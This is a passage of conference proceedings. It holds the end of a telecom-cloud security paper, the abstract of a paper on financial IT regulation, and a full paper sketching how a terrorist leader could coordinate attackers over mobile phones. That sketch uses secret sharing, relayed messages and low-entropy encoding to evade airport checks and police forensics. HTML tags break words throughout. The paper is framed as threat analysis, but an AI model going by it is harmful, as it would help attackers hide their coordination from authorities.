identified <strong>in</strong> Table 1, correspond<strong>in</strong>g security requirements and recommended mechanisms which could<br />
be applied to mitigate those threats for design<strong>in</strong>g a secure virtual resource provision<strong>in</strong>g architecture.<br />
Table 2: Summary of threats, requirements and recommended mechanisms for a secure virtual resource<br />
provision<strong>in</strong>g architecture<br />
Threat <strong>Security</strong> Requirement <strong>Security</strong> Mechanism(s)<br />
T1 Platform Integrity Secure boot, Remote attestation<br />
T2 Platform Integrity Secure boot, Remote attestation<br />
T3 Provider Authentication Mutual Authentication (IPSec)<br />
T4 Operator Authentication Mutual Authentication (IPSec)<br />
T5 Confidentiality VM Seal<strong>in</strong>g, Strong Isolation<br />
T5 Secure VM Migration Ongo<strong>in</strong>g research, TPM based migratable keys<br />
287
Mudassar Aslam and Christian Gehrmann<br />
Threat <strong>Security</strong> Requirement <strong>Security</strong> Mechanism(s)<br />
T6 Secure Provider Network Firewall, Gateway<br />
T7 Non-repudiation Sign VM launch<br />
T8 VM Isolation Secure and certified hypervisor<br />
T9 VM Isolation Secure and certified hypervisor<br />
4. Related work<br />
Provision<strong>in</strong>g virtual servers to telecommunication operators is a new field of research. Today’s state-ofthe-art<br />
service offer<strong>in</strong>g mechanisms use virtualization and allow us to <strong>in</strong>troduce telecommunication<br />
clouds. Lot of work is be<strong>in</strong>g done to address the cloud security <strong>in</strong> general but not for a telecommunication<br />
cloud. Cloud <strong>Security</strong> Alliance (CSA 2009) is an organization which is striv<strong>in</strong>g to create awareness and<br />
draft security recommendations for the providers and consumers of the cloud. CSA has recently released<br />
(<strong>Security</strong> Guidance for Critical Areas of Focus <strong>in</strong> Cloud Comput<strong>in</strong>g 2009) which is an exhaustive security<br />
guidance report and covers recommendations for security requirements <strong>in</strong> different doma<strong>in</strong>s of the cloud<br />
<strong>in</strong>frastructure. Twelve doma<strong>in</strong>s have been identified <strong>in</strong> the report cover<strong>in</strong>g governance to operational<br />
aspects of the cloud comput<strong>in</strong>g. While this report is a useful tool to identify security requirements, its<br />
scope is too broad to be applied directly on a specific scenario. The recommended approach is to identify<br />
the applicability of a specific doma<strong>in</strong> on the addressed scenario and then consider the security<br />
requirements identified <strong>in</strong> that doma<strong>in</strong>. This paper provides a focused security requirements analysis for<br />
telecommunication clouds with emphasize on establish<strong>in</strong>g technical trust between the stakeholders. The<br />
security requirements identified <strong>in</strong> our paper complement the last three doma<strong>in</strong>s <strong>in</strong> the CSA report<br />
namely “Encryption and Key Management”, “Identity and Access Management”, and “Virtualization”.<br />
Trusted Comput<strong>in</strong>g Group (TCG 2003) has also started a new <strong>in</strong>itiative recently called (Trusted Multitenant<br />
Infrastructure (TMI) 2010) which aims to def<strong>in</strong>e reference models for practical deployment of<br />
trusted cloud or shared <strong>in</strong>frastructures. The TMI group has not yet released any specification other than a<br />
short white paper (Cloud Comput<strong>in</strong>g and <strong>Security</strong> – A Natural Match 2010) which selects six specific<br />
areas of cloud comput<strong>in</strong>g from (<strong>Security</strong> Guidance for Critical Areas of Focus <strong>in</strong> Cloud Comput<strong>in</strong>g 2009)<br />
to suggest security improvements us<strong>in</strong>g TCG technologies. The selected areas <strong>in</strong>clude protect<strong>in</strong>g data at<br />
rest and transit, authentication, separation between customers, legal and regulatory issues and <strong>in</strong>cident<br />
response. The white paper hence identifies the areas where TCG mechanisms can provide security and<br />
trust <strong>in</strong> clouds. These f<strong>in</strong>d<strong>in</strong>gs are <strong>in</strong>l<strong>in</strong>e with our proposed security mechanisms <strong>in</strong> Table II. where<strong>in</strong> we<br />
propose of us<strong>in</strong>g secure boot, remote attestation and seal<strong>in</strong>g capabilities to provide authentication,<br />
<strong>in</strong>tegrity and confidentiality.<br />
Other than the above mentioned <strong>in</strong>itiatives which identify security requirements, rest of the work has been<br />
focused on provid<strong>in</strong>g solutions for the security requirements identified <strong>in</strong> this paper. Although these<br />
solutions specifically focus on the security of virtualized data centers, the build<strong>in</strong>g blocks of a data center<br />
are somehow similar to our perceived telecommunication cloud scenario. For example, both use<br />
hypervisors to compartmentalize strongly isolated Virtual Mach<strong>in</strong>es and both scenarios necessitate trust<br />
establishment <strong>in</strong> the provisioned platforms. Therefore, we f<strong>in</strong>d some solutions address<strong>in</strong>g the security<br />
requirements identified <strong>in</strong> this paper. One such solution is <strong>in</strong>troduced <strong>in</strong> Terra (Garf<strong>in</strong>kel et al. 2003)<br />
which is a Trusted Virtual Mach<strong>in</strong>e Monitor (TVMM). It fulfills the VM isolation requirement by giv<strong>in</strong>g the<br />
appearance of multiple boxes on a s<strong>in</strong>gle hardware platform and run applications of vary<strong>in</strong>g assurance<br />
levels <strong>in</strong> the appropriate box. The Terra also supports certificate-based attestation to fulfill platform<br />
<strong>in</strong>tegrity requirement. Furthermore, (Garf<strong>in</strong>kel et al. 2003) also claim high assurance level for Terra due to<br />
its small size, however a formal proof for such claim is lack<strong>in</strong>g.<br />
Some other papers particularly address mechanisms to fulfill Platform Integrity requirement identified <strong>in</strong><br />
this paper. (Huang & Peng 2009) and (Sailer et al. 2004) propose remote attestation which leverages<br />
TPM based cryptographic attestations by send<strong>in</strong>g Integrity Measurement Log (IML) <strong>in</strong> comb<strong>in</strong>ation with<br />
TPM_Quote which is securely computed by the (TPM 2007). The verifier compares the quoted response<br />
with self computed hash value from the IML to check and decide about the <strong>in</strong>tegrity of the target platform.<br />
Similarly, (Kuhlmann et al. 2006) propose alternate mechanism for remote attestation by <strong>in</strong>troduc<strong>in</strong>g<br />
property-based attestations <strong>in</strong>stead of cryptographic attestations to make it a scalable solution. (Haldar,<br />
Chandra & Franz 2004) also propose a similar remote attestation technique to fulfill platform <strong>in</strong>tegrity<br />
requirement. All these papers ma<strong>in</strong>ly discuss remote attestation techniques which are important to meet<br />
288
Mudassar Aslam and Christian Gehrmann<br />
the requirements discussed <strong>in</strong> section 3.2, but need to be complemented <strong>in</strong> order to fulfill the<br />
requirements identified <strong>in</strong> section 3.3.<br />
The architecture <strong>in</strong>troduced by (Jansen, Ramasamy & Schunter 2006) presents ways to protect the<br />
confidentiality of the user VM by leverag<strong>in</strong>g seal<strong>in</strong>g mechanism supported by TPM. We have also<br />
recommended seal<strong>in</strong>g mechanism <strong>in</strong> Table 2 to fulfill confidentiality requirement. F<strong>in</strong>ally, (Gasmi et al.<br />
2007) propose a trusted channel which focuses on the <strong>in</strong>tegrity of the target platform <strong>in</strong> establish<strong>in</strong>g a<br />
secure session. The trusted channels also features trusted comput<strong>in</strong>g mechanisms for establish<strong>in</strong>g trust<br />
between end entities. The proposed trusted channel is targeted for secure transactions over the <strong>in</strong>ternet<br />
by end users. A trusted channel is not equivalent to a complete secure launch protocol with nonrepudiation<br />
properties as discussed <strong>in</strong> section 3.3. However, the ma<strong>in</strong> pr<strong>in</strong>ciples for the design of such<br />
channels, give the basic build<strong>in</strong>g blocks for construct<strong>in</strong>g a VM launch protocol that can meet the<br />
requirements we have identified <strong>in</strong> this paper.<br />
5. Conclusion<br />
In this paper we have presented a scenario <strong>in</strong> which virtualized telecommunication resources mak<strong>in</strong>g up<br />
the telecommunication cloud, are provisioned to different telecommunication operators. We have<br />
performed a detailed security analysis of the addressed scenario tak<strong>in</strong>g both stakeholders’ concerns <strong>in</strong>to<br />
account. We started with identify<strong>in</strong>g major security threats followed by a detailed security requirements<br />
analysis with the focus on trust establishment between stakeholders. Our results present a summary of<br />
probable security threats, stakeholders’ security requirements and our recommended mechanisms to<br />
create trusted telecommunication clouds. F<strong>in</strong>ally, we presented exist<strong>in</strong>g related work which on<br />
comparison with our security analysis, shows that this paper consolidates possible security requirements<br />
from all exist<strong>in</strong>g body of literature. However, there are some other security requirements which are<br />
identified <strong>in</strong> this paper but not addressed so far by the research community. Hence, this paper identifies<br />
open research with respect to virtual platform provision<strong>in</strong>g, and therefore may serve the basis for<br />
identification of further research <strong>in</strong> this area.<br />
References<br />
Berger, S, Cáceres, R, Pendarakis, D, Sailer, R & Valdez, E 2008, 'TVDc: Manag<strong>in</strong>g <strong>Security</strong> <strong>in</strong> the Trusted Virtual<br />
Datacenter', SIGOPS Oper. Syst.<br />
Bishop, M 2004, Introduction to Computer <strong>Security</strong>, Addison-Wesley Professional.<br />
CC 2011, The Common Criteria, http://www.commoncriteriaportal.org/ .<br />
Chisnall, D 2007, The Def<strong>in</strong>itive Guide to the Xen Hypervisor, Prentice Hall PTR, Upper Saddle River, NJ, USA.<br />
CircleID 2009, Survey: Cloud Comput<strong>in</strong>g 'No Hype', But Fear of <strong>Security</strong> and Control Slow<strong>in</strong>g Adoption,<br />
http://www.circleid.com/posts/20090226_cloud_comput<strong>in</strong>g_hype_security/ .<br />
'Cloud Comput<strong>in</strong>g and <strong>Security</strong> – A Natural Match' 2010, Trusted Comput<strong>in</strong>g Group (TCG),<br />
http://www.trustedcomput<strong>in</strong>ggroup.org/.<br />
CSA 2009, Cloud <strong>Security</strong> Alliance, http://www.cloudsecurityalliance.org/ .<br />
Doorn, LV 2007, 'Trusted Comput<strong>in</strong>g Challenges', Proceed<strong>in</strong>gs of the 2007 ACM Workshop on Scalable Trusted<br />
Comput<strong>in</strong>g, ACM, New York, NY, USA.<br />
Garf<strong>in</strong>kel, T, Pfaff, B, Chow, J, Rosenblum, M & Boneh, D 2003, 'Terra: a Virtual Mach<strong>in</strong>e-based Platform for Trusted<br />
Comput<strong>in</strong>g', ACM Press.<br />
Gasmi, Y, Sadeghi, A-R, Stew<strong>in</strong>, P, Unger, M & Asokan, N 2007, 'Beyond Secure Channels', Proceed<strong>in</strong>gs of the<br />
2007 ACM Workshop on Scalable Trusted Comput<strong>in</strong>g, ACM, New York, NY, USA.<br />
Griff<strong>in</strong>, JL, Jaeger, T, Perez, R, Sailer, R, Doorn, LV & Ca'ceres, R 2005, 'Trusted Virtual Doma<strong>in</strong>s: Toward Secure<br />
Distributed Services', In Proc. of the First Workshop on Hot Topics <strong>in</strong> System Dependability, IEEE Press.<br />
Haldar, V, Chandra, D & Franz, M 2004, 'Semantic Remote Attestation - A Virtual Mach<strong>in</strong>e directed approach to<br />
Trusted Comput<strong>in</strong>g', USENIX Virtual Mach<strong>in</strong>e Research and Technology Symposium.<br />
Huang, X & Peng, Y 2009, 'An Effective Approach for Remote Attestation <strong>in</strong> Trusted Comput<strong>in</strong>g', WISA 2009 :<br />
Proceed<strong>in</strong>gs of the 2nd International Symposium on Web Information Systems and Applications, Academy<br />
Publisher, FIN-90571, OULU, FINLAND.<br />
IKE 2005, 'Internet Key Exchange (IKEv2) Protocol', Internet Eng<strong>in</strong>eer<strong>in</strong>g Task Force (IETF), RFC 4306.<br />
IPsec 2005, '<strong>Security</strong> Architecture for the Internet Protocol', Internet Eng<strong>in</strong>eer<strong>in</strong>g Task Force (IETF), RFC 4301.<br />
Jansen, B, Ramasamy, HV & Schunter, M 2006, 'Flexible Integrity Protection and Verification Architecture for Virtual<br />
Mach<strong>in</strong>e Monitors', The Second Workshop on Advances <strong>in</strong> Trusted Comput<strong>in</strong>g.<br />
Kuhlmann, D, Landfermann, R, Ramasamy, HV, Schunter, M, Ramunno, G & Vernizzi, D 2006, 'An Open Trusted<br />
Comput<strong>in</strong>g Architecture - Secure Virtual Mach<strong>in</strong>es Enabl<strong>in</strong>g User-Def<strong>in</strong>ed Policy Enforcement',<br />
www.opentc.net.<br />
KVM 2007, Kernel Based Virtual Mach<strong>in</strong>e, http://www.l<strong>in</strong>ux-kvm.org/page/Ma<strong>in</strong>_Page .<br />
L<strong>in</strong>thicum, D, Knorr, E, Gruman, G, Scheier, RL, Beckman, M & Wayner, P 2009, Cloud Comput<strong>in</strong>g Deep Dive,<br />
Sepcial Report, viewed 2010, http://www.InfoWorld.com .<br />
289
Mudassar Aslam and Christian Gehrmann<br />
Ormandy, T 2007, 'An Empirical Study <strong>in</strong>to the <strong>Security</strong> Exposure to Hosts of Hostile Virtualized Environments',<br />
CanSecWest.<br />
Sailer, R, Zhang, X, Jaeger, T & Doorn, LV 2004, 'Integrity Measurement Architecture', The Proceed<strong>in</strong>gs of the 13th<br />
USENIX <strong>Security</strong> Symposium, San Diego, California.<br />
Santos, N, Gummadi, KP & Rodrigues, R 2009, 'Towards Trusted Cloud Comput<strong>in</strong>g', Proceed<strong>in</strong>gs of the 2009<br />
Conference on Hot Topics <strong>in</strong> Cloud Comput<strong>in</strong>g, USENIX Association, Berkeley, CA, San Diego, California.<br />
'<strong>Security</strong> Guidance for Critical Areas of Focus <strong>in</strong> Cloud Comput<strong>in</strong>g' 2009, Cloud <strong>Security</strong> Alliance, V2.1,<br />
http://www.cloudsecurityalliance.org/guidance/csaguide.v2.1.pdf.<br />
Smith, J & Nair, R 2005, Virtual Mach<strong>in</strong>es: Versatile Platforms for Systems and Processes, Morgan Kaufmann<br />
Publishers.<br />
TCG 2003, Trusted Comput<strong>in</strong>g Group, http://www.trustedcomput<strong>in</strong>ggroup.org/ .<br />
TCG Specification Architecture Overview 2007, http://www.trustedcomput<strong>in</strong>ggroup.org/resources .<br />
TPM 2007, TPM Ma<strong>in</strong> Specification, http://www.trustedcomput<strong>in</strong>ggroup.org/resources/tpm_ma<strong>in</strong>_specification<br />
'Trusted Multi-tenant Infrastructure (TMI)' 2010, Trusted Comput<strong>in</strong>g Group (TCG),<br />
http://www.trustedcomput<strong>in</strong>ggroup.org/developers/trusted_multitenant_<strong>in</strong>frastructure.<br />
VMware 2010, VMware Inc., Virtualization Solutions, http://www.vmware.com/virtualization/ .<br />
290
A Mobile and Quick Terrorism<br />
Anthony Desnos and Geoffroy Gueguen<br />
Operational Cryptology and Virology Laboratory (CVO), ESIEA, France<br />
desnos@esiea.fr<br />
gueguen@esiea.fr<br />
Abstract: New technologies br<strong>in</strong>g significant changes <strong>in</strong>to our way of life, and mobile phone is one of them. It is an<br />
item which follows us everywhere, it has become somehow a part of our body. The fact is that nowadays mobile<br />
phones are like little and powerful computers. You can travel from a country to another one without your mobile<br />
phone be<strong>in</strong>g controlled by authorities, and that is an <strong>in</strong>terest<strong>in</strong>g characteristic. However your mobile phone can be<br />
turned <strong>in</strong>to a new weapon for modern terrorism. It will not be use as a weapon to attack a target (it can be used <strong>in</strong> a<br />
bomb [Madrid, 2004]), but to synchronize an attack between different unknown terrorists who do not know each<br />
other. The idea is to follow a terrorist from his formation <strong>in</strong> an Al quaeda camp to the f<strong>in</strong>al attack. We will see how it is<br />
possible for a terrorist leader to perform and plan an attack by creat<strong>in</strong>g a mobile application, and by giv<strong>in</strong>g mobile<br />
phones (with an embedded application) to different “jihadists”.<br />
Keywords: terrorism, mobile phone, android, cryptography<br />
1. Introduction<br />
If terrorists want to use smart phones, they have to resolve few questions :<br />
How a terrorist leader can control different terrorists ?<br />
How can he establish a connection with a chosen terrorist by identify<strong>in</strong>g him ?<br />
How to secure the communications and to verify the identity of the leader ?<br />
How a terrorist can recognize another one to be able to perform the f<strong>in</strong>al attack ?<br />
How we protect the leader’s identity even if some mobile phones are caught by authorities ?<br />
We will use cryptographic techniques like the secret shar<strong>in</strong>g scheme (Shamir, 1979) to efficiently and<br />
quickly perform all the attack operations, even if we saw terrorisms use old techniques (TheRegister<br />
2011). Of course, we will show how to avoid the system to be tampered when a terrorist has been<br />
caught, and how to prevent the leak of the leader’s identity as well as the one of the other terrorists.<br />
Moreover, we must protect our application with respect to controls <strong>in</strong> airports by us<strong>in</strong>g stealthy<br />
cryptographic techniques (Filiol, 2010) <strong>in</strong> order to prevent the detection based on the entropy.<br />
In the first part, we will describe the basic equipment of a group of terrorists, next we will see how the<br />
communication can be established between the leader and a “jihadist”, and between the leader and<br />
different “jihadists”. F<strong>in</strong>ally we will discuss about the consequences if a terrorist is arrested by authorities.<br />
2. Terrorist leader − terrorists<br />
2.1 The beg<strong>in</strong>n<strong>in</strong>g<br />
Dur<strong>in</strong>g the tra<strong>in</strong><strong>in</strong>g of each “jihadist”, the leader selected a team composed of X members. For each<br />
member of the team, the leader created a shared secret (Z po<strong>in</strong>ts, with a threshold of T), and each<br />
member of the team has:<br />
A classic mobile phone with a SIM card,<br />
A pre-<strong>in</strong>stalled application with : – X (T - 2) <strong>in</strong>tegers values (encoded <strong>in</strong> the application like data), – a<br />
password given orally (or by any other equivalent secure mode).<br />
Nowadays, it’s very <strong>in</strong>terest<strong>in</strong>g to use a classic mobile phone, because this k<strong>in</strong>d of object is very<br />
common, and moreover it is not verified <strong>in</strong> the airport. Even if a control is performed, the mobile phone<br />
has to be root (or jailbreak) to f<strong>in</strong>d a hidden secret, this is not possible as a standard procedure for every<br />
passenger.<br />
291
Anthony Desnos and Geoffroy Gueguen<br />
Figure 1: Initial characteristics of a leader and jihadists<br />
2.2 Interaction<br />
So the leader must have a secret shar<strong>in</strong>g with each “jihadist”. This secret will be used like an<br />
authentication to extract a valid password to decode a communication (for example, through a SMS).<br />
For example, the threshold is 3, and the values (<strong>in</strong>teger) of the secret shar<strong>in</strong>g are :<br />
X1, Y1,<br />
X2, Y2,<br />
X3, Y3,<br />
X4 (a password transformed <strong>in</strong>to an <strong>in</strong>teger), Y4.<br />
The leader have all <strong>in</strong>terest<strong>in</strong>g values :<br />
X1, Y1,<br />
X2, Y2,<br />
X3, Y3.<br />
And the “jihadist” :<br />
X3, Y3,<br />
X4, Y4.<br />
When a leader wants to send a message to a “jihadist”, he sends him X2, Y2. Next, the leader uses X1,<br />
X2, X3 to create the secret, which is then used to encode a message. The “jihadist” can decode the<br />
message with X3, X2 and X4 by solv<strong>in</strong>g the secret shar<strong>in</strong>g which is the password of the message.<br />
292
Anthony Desnos and Geoffroy Gueguen<br />
Figure 2: Initial exchange between a leader and a jihadist<br />
2.3 Shamir’s Secret Shar<strong>in</strong>g<br />
Shamir’s Secret Shar<strong>in</strong>g [SHAMIR] can implement this scheme. It comes from the idea that 2 different<br />
po<strong>in</strong>ts are sufficient to def<strong>in</strong>e a l<strong>in</strong>e, 3 different po<strong>in</strong>ts are sufficient to def<strong>in</strong>e a parabola, 4 different po<strong>in</strong>ts<br />
to def<strong>in</strong>e a cubic curve ... That is, it takes k different po<strong>in</strong>ts to def<strong>in</strong>e a polynomial of degree k − 1. To<br />
build the polynomial, choose randomly (k − 1) coefficients a1 , ...., ak−1 , and let be a0 the secret :<br />
Every participant (<strong>in</strong> our case, a “jihadist” and the leader) is given from a po<strong>in</strong>t X of this system, a pair (X,<br />
f (X)) (where each X must be different). When k participants are present, the secret can be found,<br />
otherwise it is impossible to recover it.<br />
Our secret is our private key to encode a message.<br />
293
Anthony Desnos and Geoffroy Gueguen<br />
The threshold at which it is possible to f<strong>in</strong>d the secret is determ<strong>in</strong>ed between the “jihadist” and the leader,<br />
to be the half of the generated values.<br />
2.4 Neville-Aitken’s algorithm<br />
When the leader wants to <strong>in</strong>itiate a communication with a “jihadist”, he must send him one of his<br />
elements, and the “jihadist” has to reply with one of his (it must not be the password). The procedure is<br />
mandatory to perform the calculation of the secret a0 to encode the message.<br />
To do this we can use Neville-Aitken ’s algorithm (Neville, 1992) to f<strong>in</strong>d a coefficient that allows to<br />
calculate any degree of the polynomial :<br />
In this case, we just want the coefficient of degree 0 (which is the key or the password) so :<br />
This algorithm has a space and time complexity both <strong>in</strong> O(n^2), and can be implemented easily <strong>in</strong> python<br />
(list<strong>in</strong>g 2).<br />
3. Communication<br />
There are plenty of ways a leader can communicate with a given “jihadist”. We expose some of them <strong>in</strong><br />
the follow<strong>in</strong>g section. The first way is what we could call as “standard”, while the second case uses some<br />
new technology.<br />
First, we expla<strong>in</strong> how the leader can send some data to a given person <strong>in</strong> a “secure” way, <strong>in</strong> the sense<br />
that if at some po<strong>in</strong>t, a communication is <strong>in</strong>secure, it will not expose the data. We expla<strong>in</strong> also how he<br />
can send some data <strong>in</strong> a discreet way, so that the communication is not too suspicious.<br />
294<br />
I
Anthony Desnos and Geoffroy Gueguen<br />
So, the leader has some data to be sent to a specific person (we’ll call it X ). The easiest way to do it<br />
would be to just send the pla<strong>in</strong> data, but this method has some drawbacks :<br />
The connection between X and the leader is easy to make.<br />
Each time the leader wants to communicate with someone, the communication is direct. So the<br />
leader is the central po<strong>in</strong>t of all the communications and thus is easily recognizable (but it's possible<br />
that the leader use each time a unique SIM card).<br />
The data is not protected aga<strong>in</strong>st eavesdropp<strong>in</strong>g so “anyone” can access it.<br />
In order to address these issues, we propose the follow<strong>in</strong>g scenario :<br />
The leader (as well as all the people <strong>in</strong>volved <strong>in</strong> the attack) has a phone <strong>in</strong> which a public-private key pair<br />
is present. Moreover, each participant has its own password (which is given at some time, <strong>in</strong> a tra<strong>in</strong><strong>in</strong>g<br />
camp for example).<br />
The leader, who wants its data to be only available to X, will encrypt it with X ’s public key (so, only X’s<br />
phone is able to decrypt the data). The leader will do a secret shar<strong>in</strong>g by splitt<strong>in</strong>g the ciphertext obta<strong>in</strong>ed<br />
<strong>in</strong>to a number N + 1 of elements (and fix<strong>in</strong>g one part of this secret to the password of X ), N be<strong>in</strong>g the<br />
number of middleman he wants to use to transfer the ciphertext to X.<br />
As an example, let’s say that N = 3. We will call these three <strong>in</strong>termediates Y, Z and T. The leader, who<br />
knows the phone number of each participants, send to Y, Z and T an encrypted message (by us<strong>in</strong>g each<br />
participant’s public key) <strong>in</strong> which there is a time, a dest<strong>in</strong>ation, and one part of the secret (but not the<br />
password one) to send to X. Each participant has then to decrypt the message to know that they have to<br />
send some data to some dest<strong>in</strong>ation at some given time. (Note: the time has not to be the same for all<br />
the participants, as the construction of the message can be spaced over time for more discretion).<br />
When X f<strong>in</strong>ally receives all the parts he can recover the secret by add<strong>in</strong>g its password to the data<br />
received. Thus, if his phone is taken by some police force, only X is able to recover the data.<br />
The process can be a little more elaborate than this, as the leader may use more than three<br />
<strong>in</strong>termediates, and can use a different scheme. Indeed, <strong>in</strong>stead of only hav<strong>in</strong>g one “level of <strong>in</strong>direction”<br />
with X, it is possible to encapsulate a level <strong>in</strong>to another one. Let’s take our Y, Z and T aga<strong>in</strong>. The leader<br />
can encrypt some data dest<strong>in</strong>ed to X with X ’s public key. Then, us<strong>in</strong>g T ’s public key, he encrypts the<br />
already encrypted data as well as the time at which the delivery has to be done, with the number of X (the<br />
dest<strong>in</strong>ation). Then he does the same for Z (he encrypts the encrypted data to be sent to T as well as the<br />
time at which the delivery has to be done, together with the number of T ) and for Y.<br />
F<strong>in</strong>ally, the leader send the encrypted data to Y, who will decrypt it and send the result to Z at some given<br />
time, and so on until at last X get the former data that the leader wanted to send him.<br />
Of course, the leader can use these two ways at the same time. These schemes have some drawbacks<br />
though : all the parts that are derived from the secret have to be known to be able to recover the data,<br />
and every participant ends to know each other phone number. These schemes can be modified to be<br />
tolerant to a lost of one or more part by us<strong>in</strong>g the password of a participant as the private key of the<br />
encryption process. So the leader can use a “classic” secret shar<strong>in</strong>g with the secret be<strong>in</strong>g the data to be<br />
sent encrypted with the public key correspond<strong>in</strong>g to X ’s password.<br />
In order to address the problem of participants end<strong>in</strong>g to know the phone number of others, a different<br />
way to communicate can be used. As an example, the leader may use a website to <strong>in</strong>directly<br />
communicate by post<strong>in</strong>g some messages conta<strong>in</strong><strong>in</strong>g the right data.<br />
Other technologies can be used, as the follow<strong>in</strong>g : the communication from the leader to a specific<br />
“jihadist” can be performed with Perseus <strong>in</strong> order to have a low entropy. The leader encode the message<br />
with the secret found from the secret shar<strong>in</strong>g. When a “jihadist” receives a message, he uses his<br />
password and the latest value from the leader to extract the secret and decode the message. It will work<br />
only if the password and the value are correct.<br />
295
Anthony Desnos and Geoffroy Gueguen<br />
Figure 3: Communication between a leader and a jihadist with perseus<br />
4. How can two (or more) <strong>in</strong>dividuals may recognize each other to perform the<br />
attack<br />
In this section we expla<strong>in</strong> how a leader can set-up an attack <strong>in</strong> which two (or more) participants are able<br />
to recognize each other <strong>in</strong> order to perform an attack. The idea, which is pretty simple, is the follow<strong>in</strong>g :<br />
the leader generates some secret S to be shared (e.g the <strong>in</strong>structions of the attack) and divide it<br />
depend<strong>in</strong>g on the number of participants : if there is N participants, the secret has to be split <strong>in</strong>to 2N-1<br />
parts, with N parts needed to recover the data.<br />
N of these parts have to be the password of each participants, the others (N-1 ) are generated randomly.<br />
When the attack has to be done, the leader choose a way to be used by all the participants to<br />
communicate between each other (for example a website, like pasteb<strong>in</strong>.com) and send it to each<br />
participants, as well as one part deriv<strong>in</strong>g from the secret. Some participants may receive the same part.<br />
Then each of them communicate with each other (for example <strong>in</strong> the case of pasteb<strong>in</strong>, they just post the<br />
part they were given). All participants have then access to N-1 parts of the secret, and they can recover<br />
the secret with their own password.<br />
5. Arrest<br />
If a “jihadist” is arrested by government authorities, all <strong>in</strong>formation are on the mobile phone. So they will<br />
f<strong>in</strong>d :<br />
X3, Y3,<br />
296
X2, Y2,<br />
Encoded messages.<br />
Anthony Desnos and Geoffroy Gueguen<br />
They have not enough <strong>in</strong>formation to resolve the secret shar<strong>in</strong>g <strong>in</strong> the mobile phone to decode<br />
messages, because the last <strong>in</strong>formation is only known by the “jihadist”.<br />
Figure 4: Impossible to f<strong>in</strong>d enough <strong>in</strong>formation due to the scheme<br />
6. Conclusion<br />
The <strong>in</strong>creas<strong>in</strong>g amount of new devices br<strong>in</strong>g some new vectors of attack that the authorities have to take<br />
<strong>in</strong>to account. Indeed, mobile phones embed more and more powerful components, mak<strong>in</strong>g them a new<br />
threat to be considered. They are not really checked <strong>in</strong> airport, and when they are, it is not an easy task<br />
to have access to all the data that are <strong>in</strong>side : the phone has to be jailbreak / root, and do<strong>in</strong>g so for every<br />
passenger is not really an option. As we saw, they can be used to establish a communication (it's their<br />
primary use after all) between crim<strong>in</strong>als. The communications can be secured by us<strong>in</strong>g some “everyday<br />
cryptography” (asymmetric encryption), or by us<strong>in</strong>g some new techniques like Perseus. The techniques<br />
presented <strong>in</strong> these papers are mostly not new - the Shamir Secret's Shar<strong>in</strong>g is more than 30 years old,<br />
but are not yet exploited.<br />
Acknowledgement<br />
Thanks to Eric Filiol for the orig<strong>in</strong>al idea and Robert Erra for review<strong>in</strong>g the paper.<br />
References<br />
Filiol, Eric (2010), PERSEUS Technology: New Trends <strong>in</strong> Information and Communication <strong>Security</strong><br />
Madrid (2004), http://en.wikipedia.org/wiki/2004_Madrid_tra<strong>in</strong>_bomb<strong>in</strong>gs<br />
Shamir, Adi (1979), "How to share a secret", Communications of the ACM 22 (11): 612–613<br />
Neville (1992), Press, William; Saul Teukolsky, William Vetterl<strong>in</strong>g and Brian Flannery (1992). "§3.1 Polynomial<br />
Interpolation and Extrapolation". Numerical Recipes <strong>in</strong> C. The Art of Scientific Comput<strong>in</strong>g (2nd edition ed.).<br />
TheRegister (2011), http://www.theregister.co.uk/2011/03/22/ba_jihadist_trial_sentenc<strong>in</strong>g/<br />
297
Regulatory Compliance to Ensure Information <strong>Security</strong>:<br />
F<strong>in</strong>ancial Supervision Perspective<br />
Andro Kull<br />
School of Information Sciences at the University of Tampere, F<strong>in</strong>land<br />
Andro.Kull@fi.ee<br />
Abstract: The last f<strong>in</strong>ancial crisis shows that more control is necessary for the f<strong>in</strong>ancial sector. Controls should be<br />
planned and realized at the <strong>in</strong>ternational, country and bank levels because everyone who has to use f<strong>in</strong>ancial<br />
services wants to be sure that data about their assets are secure. Almost everyone use the electronic services of<br />
f<strong>in</strong>ancial <strong>in</strong>stitutions and therefore <strong>in</strong>formation security issues can not be overemphasized. To <strong>in</strong>crease security <strong>in</strong><br />
computerized actions of f<strong>in</strong>ancial <strong>in</strong>stitutions, a certa<strong>in</strong> supervisory authorization must be established. In order to<br />
cleverly realize such questions as “How much security is necessary?”, “How much security is sufficient?” and “How to<br />
be shore that operations are secure”, a systematic approach to assess the state of security is necessary. In the<br />
current case, these questions should be answered by f<strong>in</strong>ancial supervisors to provide assurances that people’s<br />
money is safe <strong>in</strong> banks and <strong>in</strong> other f<strong>in</strong>ancial <strong>in</strong>stitutions. In this paper we shall propose a new compliance<br />
assessment and monitor<strong>in</strong>g method for these purposes. The key concept presented and used through the research<br />
is named as technology assurance (TA), it is all which gives the feel of security <strong>in</strong> us<strong>in</strong>g technology and this may be<br />
treated as synonym for the term <strong>in</strong>formation assurance (IA). To ensure technology assurance, the lowest steps have<br />
to be passed to go higher level. Technology assurance presumes that bus<strong>in</strong>ess processes are well organized,<br />
<strong>in</strong>formation assets and IT governance is well established and IT risks are managed to build up higher level<br />
assurance like <strong>in</strong>formation security measures, <strong>in</strong>formation systems/<strong>in</strong>formation security audit<strong>in</strong>g and to reach highest<br />
levels like bus<strong>in</strong>ess cont<strong>in</strong>uity preparation. To answer to the ma<strong>in</strong> research questions mentioned above, the subquestions<br />
like “How much to regulate?” should be answered. Consider<strong>in</strong>g some facts about Estonia and f<strong>in</strong>ancial<br />
sector - Estonia is a member of European Union, the bigger banks <strong>in</strong> Estonia are the subsidiaries, we have launched<br />
Euro lately - it is essential to be <strong>in</strong> accordance with European practices <strong>in</strong> develop<strong>in</strong>g our standards to regulate the<br />
f<strong>in</strong>ancial sector and IT field. Dur<strong>in</strong>g the research, survey about current arrangements <strong>in</strong> 29 European countries was<br />
studied and this paper describes the survey focus<strong>in</strong>g on the results. The question was: how the European countries<br />
regulate f<strong>in</strong>ancial sector IT field and what the requirements are the f<strong>in</strong>ancial <strong>in</strong>stitutions should fulfill to ensure the<br />
security of electronic operations? The ma<strong>in</strong> results of survey show that the most important issue to cover with<br />
regulations was IT risk management, also bus<strong>in</strong>ess cont<strong>in</strong>uity process and <strong>in</strong>formation security policy were covered<br />
<strong>in</strong> most cases. About a half of respondents highlight the need to regulate IT outsourc<strong>in</strong>g and access control<br />
management issues. In common, the survey confirms the trend for more strict regulation of IT <strong>in</strong> f<strong>in</strong>ancial sector and<br />
Estonia tends to be top level regard<strong>in</strong>g regulations.<br />
